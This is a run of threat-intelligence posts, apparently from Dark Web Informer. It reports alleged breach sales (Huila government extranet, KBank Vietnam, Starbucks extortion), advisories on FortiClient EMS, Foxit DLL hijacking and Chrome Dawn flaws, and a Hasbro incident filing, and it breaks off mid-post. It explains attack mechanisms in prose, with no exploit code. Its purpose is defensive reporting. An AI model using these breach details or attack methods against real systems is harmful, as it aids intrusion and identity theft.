Colombia's Huila Department Government Extranet Exposes Officer Data, Municipal Offices, and Government Operations Across 8 Municipalities URL: https://darkwebinformer.com/alleged-breach-of-colombias-huila-department-government-extranet-exposes-officer-data-municipal-offices-and-government-operations-across-8-municipalities/ Last updated: 2026-04-06T17:39:35.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Breach of Colombia's Huila Department Government Extranet Exposes Officer Data, Municipal Offices, and Government Operations Across 8 Municipalities April 6, 2026 - 5:32:00 PM UTC Colombia Government Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-06 17:32:00 UTC Threat Actor NyxarGroup Victim Huila Department Government Industry Government Category Data Breach Collaborators ArcRaidersPlayer, Petro\_Escobar, CryptoDead Municipalities 8 Government Offices 15+ Departments Price $150 Network Open Web Source extranet.huila.gov.co Country Colombia ## Incident Overview NyxarGroup, in collaboration with three other threat actors (ArcRaidersPlayer, Petro\_Escobar, and CryptoDead), claims to be selling data exfiltrated from extranet.huila.gov.co, the government extranet for the Department of Huila in Colombia. This marks NyxarGroup's continued targeting of Latin American government infrastructure, following their earlier breaches of Chile's Ley del Lobby platform and Servicio Civil, and CryptoDead's involvement in the ICFES Colombia data leak. The breach exposes two main categories of data: - **Officer Information**: Government employee records with the following fields: Nombre (name), Cargo (position/title), Tipo (type), Telefono (phone), Correo (email), Entidad (entity/agency), Unidad (unit), Sede (office location), and Grupo (group/department). - **Municipal Offices**: User data, contacts, and site information for 8 mayors' offices (Alcaldias) across the Huila department: Algeciras, Campoalegre, Isnos, Nataga, Palermo, Pitalito, Rivera, and Tello. The listing also references data from across 15+ government departments and offices including internal control, treasury, the governor's office, legal, rural and business development, planning, secretary of education, secretary of health, ICTs, traffic, works unit, dco-alg-general-warehouse, and the family commissioner. Additional information from the Government of Huila itself is also mentioned. The data is priced at $150, with contact via PM or SimpleX messaging. The low price point and the collaborative nature of the listing (four named actors working together) suggest this is part of an organized campaign targeting Colombian government infrastructure. The fact that CryptoDead, who previously leaked the ICFES data affecting 30 million Colombians, is involved as a collaborator indicates a group with established interest in Colombian government targets. ## Compromised Data Categories Government Officer Names Position Titles Phone Numbers Email Addresses Government Entity Assignments Organizational Units Office Locations Municipal Mayors' Office Data (8) Internal Control Records Treasury Data Governor's Office Records Health & Education Secretary Data ## Image Preview [![Forum post by NyxarGroup selling Huila Colombia government extranet data with officer information fields, collaborator credits, and sample code block](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/bbebe659-7dba-4c29-8043-26334419d9c3.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/bbebe659-7dba-4c29-8043-26334419d9c3.png) [![Municipal mayors offices affected across 8 Huila municipalities, government department listings, sample data, and $150 pricing](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/bbebe659-7dba-4c29-8043-26334419d9c4.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/bbebe659-7dba-4c29-8043-26334419d9c4.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets the government extranet (extranet.huila.gov.co) to gain unauthorized access to officer records, municipal data, and departmental information across Huila's government infrastructure. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts structured government data from the extranet including officer directories, organizational structures, and municipal office records across 15+ departments and 8 municipalities. ](https://attack.mitre.org/techniques/T1213/) [ T1589.003 Gather Victim Identity: Employee Names Harvests government officer names, positions, contact details, and organizational assignments, creating a directory useful for social engineering and targeted attacks against Huila's government. ](https://attack.mitre.org/techniques/T1589/003/) [ T1567 Exfiltration Over Web Service Advertises and sells the stolen government data through web forums for $150, coordinated across four collaborating threat actors with contact via PM or SimpleX messaging. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### CVE-2026-35616: FortiClient EMS Pre-Auth API Bypass Under Active Exploitation URL: https://darkwebinformer.com/cve-2026-35616-forticlient-ems-pre-auth-api-bypass-under-active-exploitation/ Last updated: 2026-04-06T17:16:33.000Z Zero-Day · Actively Exploited # CVE-2026-35616: FortiClient EMS Pre-Auth API Bypass Under Active Exploitation A critical zero-day in Fortinet's endpoint management server allows unauthenticated remote attackers to bypass API protections and execute arbitrary code. Exploitation began over the Easter weekend. Dark Web Informer April 6, 2026 6 min read CVECVE-2026-35616 ProductFortinet FortiClient EMS Bug ClassImproper Access Control, [CWE-284](https://cwe.mitre.org/data/definitions/284.html) CVSS 3.19.1 / Critical ExploitationConfirmed in the wild (zero-day) ImpactUnauthenticated remote code execution AffectedFortiClient EMS 7.4.5, 7.4.6 FixHotfixes available; full fix in upcoming 7.4.7 ReportersSimo Kohonen (Defused Cyber), Nguyen Duc Anh KEVAdded to CISA KEV on April 6, 2026 NVD Entry[nvd.nist.gov/vuln/detail/CVE-2026-35616](https://nvd.nist.gov/vuln/detail/CVE-2026-35616) Fortinet has released emergency hotfixes for **CVE-2026-35616**, a critical pre-authentication API access bypass in FortiClient Endpoint Management Server (EMS). The vulnerability carries a CVSS score of **9.1** and is already being [actively exploited in the wild](https://www.bleepingcomputer.com/news/security/new-fortinet-forticlient-ems-flaw-cve-2026-35616-exploited-in-attacks/). Fortinet published the advisory and shipped hotfixes over the Easter weekend after Defused Cyber reported observing zero-day exploitation earlier in the week. The flaw allows an unauthenticated remote attacker to send specially crafted requests that bypass API authentication and authorization checks, ultimately enabling execution of unauthorized code or commands on the server. CISA added CVE-2026-35616 to its [Known Exploited Vulnerabilities catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) on April 6. ## What is FortiClient EMS FortiClient Endpoint Management Server is Fortinet's centralized platform for deploying, configuring, and monitoring security policies across devices running the FortiClient agent. It is a core component of many enterprise Fortinet deployments, managing endpoint telemetry, VPN configurations, vulnerability scanning, and compliance enforcement. Because EMS has visibility into and control over every managed endpoint, compromising it gives an attacker a foothold with extraordinary reach. ## The vulnerability CVE-2026-35616 is an improper access control flaw ([CWE-284](https://cwe.mitre.org/data/definitions/284.html)) in the FortiClient EMS API layer. The root cause is insufficient authentication and authorization enforcement on certain API endpoints. An attacker does not need any credentials to exploit it. By sending crafted HTTP requests to the EMS server, the attacker can bypass the API's security checks entirely and escalate to code execution. The attack is remote, requires no user interaction, and has low complexity. All three impact dimensions (confidentiality, integrity, and availability) are rated High in the CVSS vector. In practical terms, anyone who can reach the EMS server over the network can compromise it without any prior access or social engineering. **Holiday weekend timing.** According to [watchTowr CEO Benjamin Harris](https://thehackernews.com/2026/04/fortinet-patches-actively-exploited-cve.html), exploitation attempts against CVE-2026-35616 were first recorded against their honeypots on March 31\. The Easter weekend timing was likely deliberate: security teams are understaffed, on-call engineers are distracted, and the gap between compromise and detection can stretch from hours to days. ## Connection to CVE-2026-21643 This is the second critical FortiClient EMS zero-day to come under active exploitation in recent weeks. **CVE-2026-21643** (CVSS 9.1), a SQL injection vulnerability in FortiClient EMS, was [reported as exploited by Defused Cyber on March 28](https://www.helpnetsecurity.com/2026/04/04/forticlient-ems-zero-day-cve-2026-35616/). Both flaws were discovered by Defused, with Nguyen Duc Anh also credited for CVE-2026-35616. It is not yet known whether the same threat actor is behind both campaigns, or whether the two vulnerabilities are being chained together. However, the pattern is clear: attackers are actively probing FortiClient EMS as a high-value entry point into enterprise networks. Mar 28 **CVE-2026-21643** \- Defused Cyber reports first exploitation of SQL injection flaw in FortiClient EMS. Mar 31 watchTowr honeypots record first exploitation attempts against CVE-2026-35616. Apr 4 Defused Cyber publicly discloses CVE-2026-35616 as a zero-day. Fortinet publishes advisory and hotfixes. Apr 6 CISA adds CVE-2026-35616 to KEV catalog. VulnCheck also adds it to their KEV. ## Affected versions and fixes The vulnerability affects FortiClient EMS versions 7.4.5 and 7.4.6\. The 7.2 branch is not affected. Fortinet has not stated whether the 8.0 branch is impacted. Hotfixes are available now, and a permanent fix will be included in the upcoming 7.4.7 release. Affected Version Hotfix FortiClient EMS 7.4.5 [Hotfix available](https://docs.fortinet.com/document/forticlient/7.4.5/ems-release-notes/832484) FortiClient EMS 7.4.6 [Hotfix available](https://docs.fortinet.com/document/forticlient/7.4.6/ems-release-notes/832484) FortiClient EMS 7.4.7 Upcoming (includes full fix) ## What to do **Apply the hotfix immediately.** Fortinet has published hotfixes for both 7.4.5 and 7.4.6\. These are sufficient to prevent exploitation entirely according to Fortinet's advisory. **Restrict network access to EMS.** FortiClient EMS should not be exposed to the internet. If it is, restrict access to trusted management networks and VPN-only access immediately. **Check for signs of compromise.** Review EMS server logs for unusual API requests, unexpected authentication events, or unfamiliar processes. The exploitation window has been open since at least March 31. **Assess exposure to CVE-2026-21643.** If you have not already patched the SQL injection flaw from late March, do so now. The two vulnerabilities may be chained by the same threat actors. **Plan for the 7.4.7 upgrade.** While the hotfix addresses the immediate risk, upgrading to 7.4.7 when available will include the permanent fix and should be scheduled as a follow-up. ## Bigger picture Fortinet products continue to be a favored target for attackers. Enterprise management servers like FortiClient EMS are particularly attractive because they sit at the center of endpoint security infrastructure, with credentials, policies, and network-wide control planes. Compromising EMS can give an attacker the ability to push malicious configurations to every managed endpoint, disable security controls, or exfiltrate telemetry data across the entire fleet. The holiday weekend timing reinforces a well-established pattern in attacker behavior. Major vulnerability exploits frequently land on weekends and holidays when incident response capabilities are reduced. Organizations should ensure their patching and monitoring processes do not have coverage gaps during these periods. Two critical zero-days in the same product within ten days, both discovered by the same research group, suggests that FortiClient EMS has become a focused target for both offensive researchers and threat actors. Organizations running FortiClient EMS should treat it as a high-risk asset and ensure it receives priority attention in vulnerability management programs. Sources: [BleepingComputer](https://www.bleepingcomputer.com/news/security/new-fortinet-forticlient-ems-flaw-cve-2026-35616-exploited-in-attacks/) · [The Hacker News](https://thehackernews.com/2026/04/fortinet-patches-actively-exploited-cve.html) · [Help Net Security](https://www.helpnetsecurity.com/2026/04/04/forticlient-ems-zero-day-cve-2026-35616/) · [eSecurity Planet](https://www.esecurityplanet.com/threats/cve-2026-35616-forticlient-ems-flaw-under-active-exploitation/) · [Security Affairs](https://securityaffairs.com/190392/hacking/cve-2026-35616-fortinet-fixes-actively-exploited-high-severity-flaw.html) · [runZero](https://www.runzero.com/blog/fortinet-forticlient-ems/) · [Decipher](https://decipher.sc/2026/04/04/fortinet-cve-2026-35616-actively-exploited/) · [NIST NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-35616) ### Alleged Breach of KBank Vietnam Exposes 10.1 Million Credit Registration Records With National IDs, Salaries, Credit Scores, and Employer Details URL: https://darkwebinformer.com/alleged-breach-of-kbank-vietnam-exposes-10-1-million-credit-registration-records-with-national-ids-salaries-credit-scores-and-employer-details/ Last updated: 2026-04-06T17:16:42.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Breach of KBank Vietnam Exposes 10.1 Million Credit Registration Records With National IDs, Salaries, Credit Scores, and Employer Details April 6, 2026 - 12:08:15 PM UTC Vietnam Banking / Financial Services Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-06 12:08:15 UTC Threat Actor hackboy Victim KBank Vietnam (Kasikornbank) Industry Banking / Financial Services Category Data Breach Total Records 10,152,989 Extraction Date February 2026 Source System Kbank\_Vietnam\_Core Severity Critical Price Contact Seller Network Open Web Country Vietnam ## Incident Overview A threat actor going by hackboy claims to be selling credit registration data from KBank Vietnam (Kasikornbank's Vietnamese operations), including both accepted and pending loan applications. The dataset allegedly contains 10,152,989 records extracted in February 2026 from the Kbank\_Vietnam\_Core system. This is a major banking data breach that exposes the full financial profile of millions of Vietnamese loan applicants. The sample data and field listing reveal an exceptionally detailed per-record structure. Each registration includes: - **Identity Data**: Customer IDs, full names (Vietnamese), national ID numbers (CMND/CCCD, Vietnam's citizen identification), dates of birth, and phone numbers. - **Residential Data**: Full home addresses including ward, district, and city details. - **Employment and Income**: Job titles, base salaries, employer names, and work locations. The sample data shows specific company names, salary figures, and position titles for each applicant. - **Credit Data**: CIC credit scores (Vietnam's Credit Information Center scores used by all Vietnamese banks for lending decisions), risk classifications (the sample shows "Watchlist\_B" categorization), and branch names (Sunwah Branch HCM in the sample). - **Relationship Data**: A relationship field is included in each record, suggesting the database captures family or guarantor connections between applicants. - **Profile Classification**: Profile type fields categorize each record's loan application status. - **System Metadata**: Export dates (the sample shows April 6, 2026 at 13:17:51), security tags marked "CONFIDENTIAL-INTERNAL-USE", and system origin tagged as "Kbank\_Vietnam\_Core". The combination of national ID numbers, salaries, employer details, credit scores, and risk classifications makes this one of the most complete financial identity datasets to appear in a breach listing. For affected individuals, this data is sufficient for loan fraud, identity theft, social engineering against their employers, and targeted financial scams. The CIC credit scores are particularly sensitive because they are used across Vietnam's entire banking system for credit decisions. ## Compromised Data Categories Customer IDs Full Names (Vietnamese) National ID Numbers (CMND/CCCD) Dates of Birth Phone Numbers Home Addresses Job Titles Base Salaries Employer Names Work Locations CIC Credit Scores Risk Classifications Bank Branch Names Relationship / Guarantor Data Loan Profile Types ## Image Preview [![Forum post by hackboy selling 10.1 million KBank Vietnam credit registration records with data fields in Vietnamese and English, sample PHP code showing loan applicant details including national IDs, salaries, credit scores, and system metadata](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/78923695862978569278356978269783592.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/78923695862978569278356978269783592.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in the bank's web applications or core banking API to gain unauthorized access to the Kbank\_Vietnam\_Core credit registration database. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts over 10 million structured credit registration records from the core banking system, pulling personal identifiers, financial profiles, employment details, and credit risk assessments. ](https://attack.mitre.org/techniques/T1213/) [ T1589.001 Gather Victim Identity: Credentials Harvests national ID numbers (CMND/CCCD), personal details, salary information, and credit scores for 10.1 million individuals, creating a comprehensive financial identity theft dataset. ](https://attack.mitre.org/techniques/T1589/001/) [ T1005 Data from Local System Extracts data directly from the core banking system with system metadata including export timestamps, confidentiality tags, and system origin identifiers confirming internal access. ](https://attack.mitre.org/techniques/T1005/) [ T1567 Exfiltration Over Web Service Advertises and sells the stolen banking data through web forums and Telegram, with samples and pricing available via direct message and middleman/escrow accepted. ](https://attack.mitre.org/techniques/T1567/) [ T1657 Financial Theft The combination of national IDs, salaries, employer details, and CIC credit scores enables loan fraud, identity theft, and targeted financial scams against millions of Vietnamese banking customers. ](https://attack.mitre.org/techniques/T1657/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### CVE-2026-3775: DLL Hijacking in Foxit PDF Editor/Reader Update Service URL: https://darkwebinformer.com/cve-2026-3775-dll-hijacking-in-foxit-pdf-editor-reader-update-service/ Last updated: 2026-04-02T21:17:44.000Z Vulnerability Disclosure # CVE-2026-3775: DLL Hijacking in Foxit PDF Editor/Reader Update Service A local privilege escalation flaw in Foxit's update mechanism lets low-privileged users execute arbitrary code as SYSTEM through a classic DLL search-order hijack. Dark Web Informer April 2, 2026 5 min read CVECVE-2026-3775 ProductFoxit PDF Editor / Foxit PDF Reader Bug ClassDLL Hijacking, [CWE-427](https://cwe.mitre.org/data/definitions/427.html) CVSS 3.17.8 / High VectorAV:L / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H ImpactLocal privilege escalation to SYSTEM FixPDF Editor/Reader 2026.1, Editor 14.0.3, Editor 13.2.3 PlatformWindows, macOS NVD Entry[nvd.nist.gov/vuln/detail/CVE-2026-3775](https://nvd.nist.gov/vuln/detail/CVE-2026-3775) Foxit has released updated versions of its PDF Editor and PDF Reader products to address **CVE-2026-3775**, a high-severity local privilege escalation vulnerability in the application's update service. The flaw was published on April 1, 2026 and carries a CVSS 3.1 base score of **7.8**. Foxit has issued patches across multiple product lines, including the 2026.1, 14.0.3, and 13.2.3 branches. The vulnerability is a textbook DLL search-order hijacking issue. The update service loads system libraries from a search path that includes directories writable by low-privileged users, allowing a local attacker to plant a malicious DLL and have it loaded with SYSTEM privileges. ## How the bug works When Foxit PDF Editor or Reader checks for updates, its update service resolves and loads certain system DLLs. The problem is that the search path used during this process is not strictly limited to trusted system directories. It includes locations that standard, unprivileged users can write to. This creates a straightforward attack path: a local attacker places a malicious DLL with the expected filename into one of those writable directories. The next time the update service runs, it discovers the attacker's DLL before the legitimate system library and loads it. Because the update service runs with elevated privileges, the attacker's code executes as SYSTEM, giving them full control over the machine. This class of vulnerability, known as [CWE-427: Uncontrolled Search Path Element](https://cwe.mitre.org/data/definitions/427.html), has been well-understood for years. It remains common in Windows desktop applications because DLL loading behavior involves multiple search locations by default, and developers must explicitly restrict the search path to prevent hijacking. **Low complexity, high impact.** The CVSS vector shows this is a low-complexity, local attack requiring only low privileges and no user interaction. All three impact metrics (confidentiality, integrity, availability) are rated High. In practical terms, any user with a standard account on a shared workstation or terminal server could escalate to SYSTEM without needing to trick an administrator into doing anything. ## Affected products The vulnerability affects Foxit PDF Editor and Foxit PDF Reader on both Windows and macOS. The specific affected and fixed versions are: Product Fixed Version PDF Editor (Windows) 2026.1 / 14.0.3 / 13.2.3 PDF Editor (Mac) 2026.1 / 13.2.3 PDF Reader (Windows) 2026.1 PDF Reader (Mac) 2026.1 Versions 2025.3 and earlier are confirmed affected. Organizations running older branches (13.x or 14.x) should update to at least 13.2.3 or 14.0.3 respectively. ## Why this matters in enterprise environments Foxit PDF Editor and Reader are widely deployed in enterprise environments as alternatives to Adobe Acrobat. In many organizations, they are installed on shared workstations, terminal servers, and VDI images where multiple users share the same system. A local privilege escalation from standard user to SYSTEM is particularly dangerous in these scenarios because it allows any authenticated user to fully compromise a shared machine, pivot to other systems, install persistent backdoors, and access data belonging to other users on the same host. The fact that the vulnerability requires no user interaction makes it especially appealing for automated exploitation. A malicious insider or an attacker who has gained initial access through phishing or another vector could trivially escalate without any social engineering. ## What to do **Update Foxit products immediately.** Open Foxit PDF Editor or Reader, go to Help, then About, then Check for Update. Alternatively, [download the latest versions from Foxit's security bulletin page](https://www.foxit.com/support/security-bulletins.html). **Audit writable directories in the DLL search path.** Review the file system permissions on directories that the Foxit update service searches when loading libraries. Restrict write access where possible. **Monitor for suspicious DLLs.** Check for unexpected DLL files appearing in application directories or user-writable paths. EDR solutions can flag DLL side-loading attempts in real time. **Consider disabling the auto-update service temporarily.** If patching cannot happen immediately, disabling the Foxit update service removes the vulnerable code path until the update can be applied. ## Broader context DLL hijacking vulnerabilities continue to surface in desktop applications year after year. Despite being a well-documented weakness, the default DLL search order on Windows makes it easy for developers to accidentally introduce these flaws. The update mechanism is a particularly sensitive component because it typically runs with elevated privileges, amplifying the impact of any search-path mistake. Foxit has a history of responding to security reports and issuing timely patches. This disclosure was coordinated, with the CVE reserved on March 8 and the advisory published alongside fixed versions on April 1\. Organizations that have Foxit products in their software inventory should treat this as a high-priority patch, especially on multi-user systems. Sources: [Foxit Security Bulletins](https://www.foxit.com/support/security-bulletins.html) · [NIST NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-3775) · [THREATINT CVE Database](https://cve.threatint.eu/CVE/CVE-2026-3775) · [CIRCL Vulnerability Lookup](https://vulnerability.circl.lu/vuln/cve-2026-3775) · [CWE-427: Uncontrolled Search Path Element](https://cwe.mitre.org/data/definitions/427.html) ### Threat Actor Leaderboard (Currently Elite Only) URL: https://darkwebinformer.com/threat-actor-leaderboard-currently-elite-only/ Last updated: 2026-07-21T19:36:11.000Z _This post is for subscribers on the Elite tier only._ ### Hasbro, Inc. has filed Form 8-K due to a Cybersecurity Incident URL: https://darkwebinformer.com/hasbro-inc-has-filed-form-8-k-due-to-a-cybersecurity-incident/ Last updated: 2026-04-01T18:47:36.000Z On March 28, 2026, Hasbro, Inc. (the “Company”) identified unauthorized access to the Company’s network. Upon discovery, the Company promptly activated its security incident response protocols, implemented containment measures, including proactively taking certain systems offline, and launched an investigation with the assistance of third-party cybersecurity professionals. The Company’s investigation is ongoing, and it is working diligently to resolve the matter and determine the full scope of impact. The Company has implemented and continues to implement business continuity plans to enable it to continue to take orders, ship product and conduct other key operations while it resolves this situation. The need to run these interim measures may continue for several weeks before the situation is fully resolved and may result in some delays. The Company is also working to identify and review the files potentially impacted and will take additional actions as appropriate based on its review and findings, including providing any notifications deemed necessary under applicable law. The Company will continue to implement measures to secure its business operations and take additional steps as appropriate. Source: ### Chrome Zero-Day CVE-2026-5281: A Use-After-Free in Dawn's WebGPU Layer URL: https://darkwebinformer.com/chrome-zero-day-cve-2026-5281-a-use-after-free-in-dawns-webgpu-layer/ Last updated: 2026-04-01T18:02:23.000Z Vulnerability Disclosure # Chrome Zero-Day CVE-2026-5281: A Use-After-Free in Dawn's WebGPU Layer Google ships an emergency patch for an actively exploited memory corruption bug in its GPU abstraction layer, the fourth Chrome zero-day of the year. Dark Web Informer April 1, 2026 · 5:39 PM 6 min read CVECVE-2026-5281 ComponentDawn (WebGPU), Chromium Bug ClassUse-After-Free, [CWE-416](https://cwe.mitre.org/data/definitions/416.html) SeverityHigh (Chromium rating) ExploitationConfirmed in the wild ImpactArbitrary code execution via crafted HTML Fix146.0.7680.177/.178 (Win/Mac), .177 (Linux) ReporterPseudonymous (86ac1f158...) NVD Entry[nvd.nist.gov/vuln/detail/CVE-2026-5281](https://nvd.nist.gov/vuln/detail/CVE-2026-5281) On April 1, 2026, Google pushed an out-of-band update to Chrome's Stable Desktop channel. The headline fix is **CVE-2026-5281**, a use-after-free in [Dawn](https://dawn.googlesource.com/dawn), the open-source, cross-platform library that implements the WebGPU standard inside Chromium. Google [acknowledged](https://chromereleases.googleblog.com/) that an exploit already exists in the wild, though it has not shared details about who is using it or what they are targeting. This is the fourth actively exploited Chrome zero-day patched this year, following earlier fixes for bugs in the CSS engine, the [Skia graphics library, and the V8 JavaScript engine](https://www.bleepingcomputer.com/news/security/google-fixes-fourth-chrome-zero-day-exploited-in-attacks-in-2026/). ## Why Dawn matters Dawn is the layer that sits between web applications calling WebGPU APIs and the actual GPU hardware. It translates high-level graphics and compute instructions into platform-specific GPU calls: Vulkan on Linux, Metal on macOS, Direct3D on Windows. Because it manages GPU memory directly, any memory-safety bug here is serious. It deals with allocation, deallocation, and synchronization of resources that the GPU and CPU share. WebGPU is still relatively new but increasingly adopted for games, machine learning inference, and data visualization running in the browser. That growing surface area means Dawn's code paths are exercised in more diverse ways, which is exactly where memory-lifecycle mistakes tend to surface. ## The bug A use-after-free occurs when code accesses memory through a pointer that still exists after the memory it references has been freed. If that freed block gets reallocated for something else, the stale pointer now points to attacker-influenced data, which can be leveraged to hijack control flow. According to the [NVD description](https://nvd.nist.gov/vuln/detail/CVE-2026-5281), CVE-2026-5281 allows a remote attacker *who has already compromised the renderer process* to execute arbitrary code through a crafted HTML page. That qualifier is important: it means this bug is most likely part of an exploit chain, where a separate vulnerability first breaks into the renderer, and then this Dawn flaw is used to escalate, potentially escaping Chrome's sandbox entirely. Google has restricted access to the bug tracker entry, which is standard practice for actively exploited flaws. Full technical details will not be public until most users have updated. **Same researcher, multiple bugs.** The pseudonymous hunter who reported CVE-2026-5281 also reported a heap buffer overflow in WebGL ([CVE-2026-4675](https://nvd.nist.gov/vuln/detail/CVE-2026-4675)), a separate Dawn UAF ([CVE-2026-4676](https://nvd.nist.gov/vuln/detail/CVE-2026-4676)), and a third Dawn UAF (CVE-2026-5284), all patched in the last two Chrome releases. That cluster points to a sustained research effort focused on Chrome's graphics stack. ## 2026 Chrome zero-days so far Feb 2026 **CVE-2026-2441** \- Use-after-free in the CSS component (CSSFontFeatureValuesMap). Mar 2026 **[CVE-2026-3909](https://nvd.nist.gov/vuln/detail/CVE-2026-3909)** \- Out-of-bounds write in the Skia 2D graphics library. Mar 2026 **[CVE-2026-3910](https://nvd.nist.gov/vuln/detail/CVE-2026-3910)** \- Inappropriate implementation in V8 (JavaScript/Wasm engine). Apr 1, 2026 **CVE-2026-5281** \- Use-after-free in Dawn (WebGPU). ## Affected versions and patched builds Every Chrome release before the versions listed below is vulnerable. Because Dawn is part of the Chromium open-source project, other browsers built on Chromium are also affected. [Vivaldi has already shipped its fix](https://www.helpnetsecurity.com/2026/04/01/google-chrome-zero-day-cve-2026-5281/). Microsoft is working on an Edge update. Platform Fixed Version Windows 146.0.7680.177 / .178 macOS 146.0.7680.177 / .178 Linux 146.0.7680.177 ## What to do **Update Chrome immediately.** Go to Menu, then Help, then About Google Chrome. Let the browser pull the update and relaunch. **Patch other Chromium browsers.** If you use Edge, Brave, Opera, or Vivaldi, check for updates from those vendors as well. **Verify auto-update is on.** Enterprise admins should confirm that group policies are not blocking Chrome updates, especially on managed fleets. **Watch for follow-up disclosures.** Given the cluster of related Dawn bugs from the same reporter, additional patches or advisories may follow. ## Bigger picture Four zero-days in four months is a notable pace, and three of the four target graphics or rendering subsystems (CSS, Skia, Dawn). This tracks with a broader industry trend: as browsers add more powerful APIs like WebGPU, WebCodecs, and WebTransport, the amount of low-level, performance-critical code exposed to untrusted web content keeps growing. Memory-safety bugs are an almost inevitable consequence in codebases written in C++. Chrome's sandbox architecture provides defense in depth, which is why the NVD description specifies that exploiting CVE-2026-5281 requires a prior renderer compromise. But exploit chains are exactly how sophisticated actors operate: a rendering bug to get into the sandbox, a second bug to get out. Each link in the chain matters. In addition to the zero-day, [this Chrome release addressed 20 other vulnerabilities](https://www.bleepingcomputer.com/news/security/google-fixes-fourth-chrome-zero-day-exploited-in-attacks-in-2026/), most rated high severity. Staying current on browser patches remains one of the highest-leverage things any user or organization can do. Sources: [Google Chrome Releases](https://chromereleases.googleblog.com/) · [NIST NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-5281) · [The Hacker News](https://thehackernews.com/2026/04/new-chrome-zero-day-cve-2026-5281-under.html) · [BleepingComputer](https://www.bleepingcomputer.com/news/security/google-fixes-fourth-chrome-zero-day-exploited-in-attacks-in-2026/) · [Help Net Security](https://www.helpnetsecurity.com/2026/04/01/google-chrome-zero-day-cve-2026-5281/) · [CyberInsider](https://cyberinsider.com/google-fixes-actively-exploited-chrome-zero-day-flaw-update-now/) ### ShadowByt3s Claims Starbucks Breach With 10GB of Proprietary Source Code, Beverage Machine Firmware, and Global Management Tools From Compromised S3 Bucket URL: https://darkwebinformer.com/shadowbyt3s-claims-starbucks-breach-with-10gb-of-proprietary-source-code-beverage-machine-firmware-and-global-management-tools-from-compromised-s3-bucket/ Last updated: 2026-04-01T16:43:21.000Z Dark Web Informer - Cyber Threat Intelligence # ShadowByt3s Claims Starbucks Breach With 10GB of Proprietary Source Code, Beverage Machine Firmware, and Global Management Tools From Compromised S3 Bucket April 1, 2026 - 11:07:09 AM UTC United States Food & Beverage / Retail Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-01 11:07:09 UTC Threat Actor ShadowByt3s (BlackVortex1) Victim Starbucks Industry Food & Beverage / Retail Category Data Breach / Extortion Data Size 10 GB Source sbux-assets S3 Bucket Data Type Source Code / Firmware / IP Ransom Deadline April 5, 2026 at 5:00 PM Severity Critical Insider Recruitment Active (30/70 Split) Country United States ## Incident Overview A threat group calling themselves ShadowByt3s, posted by the actor BlackVortex1, claims to have breached Starbucks by compromising the sbux-assets S3 bucket and exfiltrating 10GB of proprietary intellectual property including source code, firmware, and global management tools. The group describes this as part of a new campaign targeting misconfigured cloud assets and has set a ransom deadline of April 5, 2026 at 5:00 PM, after which they state all data will be publicly leaked. The stolen data is organized into four categories, all originating from the sbux-assets S3 bucket: - **Proprietary Hardware and Operational Technology**: Beverage dispenser firmware in hex file format for core hardware controllers, including Siren System components and Blue Sparq motor boards. Mastrena II espresso machine control logic including touch-screen interface code and stepper motor configurations (Stepper\_050\_Board\_X.hex). FreshBlends proprietary code and UI packages for automated smoothie and frozen drink stations, including ingredient ratios and pricing logic. 